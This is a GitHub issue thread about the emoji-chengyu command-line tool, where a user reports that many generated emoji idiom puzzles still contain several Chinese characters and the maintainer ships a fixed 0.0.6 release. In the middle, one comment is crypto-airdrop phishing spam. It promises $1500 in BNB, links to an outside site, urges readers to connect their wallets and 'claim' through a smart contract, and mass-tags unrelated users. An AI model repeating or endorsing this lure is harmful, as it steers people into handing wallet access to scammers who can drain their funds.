### ISSUE TITLE
emoji-chengyu-cli 生成的emoji很多都带多个中文

### ISSUE THREAD

**Issue by gocpplua** [alingse/emoji-chengyu#3]
emoji-chengyu-cli --count 2000
🥽古绝唱 	 千古绝唱
大💧倾盆 	 大雨倾盆
精神焕💇 	 精神焕发
兵荒🦄乱 	 兵荒马乱
炯炯🥑神 	 炯炯有神
庞然大👩‍🔬 	 庞然大物
东张🍉望 	 东张西望
感同身👩‍🏫 	 感同身受
赤🎄忠心 	 赤胆忠心
大快👤心 	 大快人心
望洋😬叹 	 望洋兴叹
👨‍🔧目远望 	 极目远望
欢欣鼓👯 	 欢欣鼓舞
老态🦖钟 	 老态龙钟
😮心动魄 	 惊心动魄
🤖早贪黑 	 起早贪黑
蓬头🌰齿 	 蓬头历齿

**Comment by alingse** [comment]
1我看下，感觉是个bug，哈哈哈，你再找下其他参数看看，周末修一下，白天真没空

**Comment by alingse** [comment]
@gocpplua 我看线上已经按照表情的数量排序了，你的是哪个版本。
还有可能就是  汉字 -- 拼音 -- 表情 对应的不够多，
我觉得可以后续支持 load 本地 data 可能会好点。

**Comment by gocpplua** [comment]
> 
 pip3 list 看来下，是：
emoji-chengyu         0.0.5

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @Wadprog, @fernandoafonso, @ASchmidt1024, @ImPureSilver, @usherfu, @slyons, @U3DC, @mugman174, @maxrugen, @nurrizkyimani, @IanPatterson99, @oOWhiteOo, @Aswanth00Five, @AkinchanKushwaha, @dromzeh, @Tizibinki, @pepelele, @Meercat33, @ethanjyx, @ryihan, @zeabdelkhalek, @mackeze, @bilalbousselma, @tarsiec, @nirajhi, @kingdavid420, @blockshine, @maxime-louis14, @wannurhadi, @p-raj, @kutay-dev, @blackvalyrian, @songroger, @futursolo, @esalehi1, @gdm3, @willisccc, @Jevgens, @AndreVarandas, @Axemery, @armancaptain, @chafla, @Shan7anu, @tehmaspc, @oojr, @jeffcarp, @vimor0328, @0l1fe, @agafforov, @sld

**Comment by ImPureSilver** [comment]
Reported.

**Comment by alingse** [comment]
那我来看下，感觉可能是某个版本有问题 @ImPureSilver @gocpplua

**Comment by alingse** [comment]
@ImPureSilver @gocpplua 不知道什么问题，但是最新的代码是 ok的，发了 0.0.6 新版本
![截屏2024-01-03 00 25 00](https://github.com/alingse/emoji-chengyu/assets/11423310/87c01635-bff3-49dd-a078-6e05f35d561a)

🤜🌰🐜👧 全力以赴
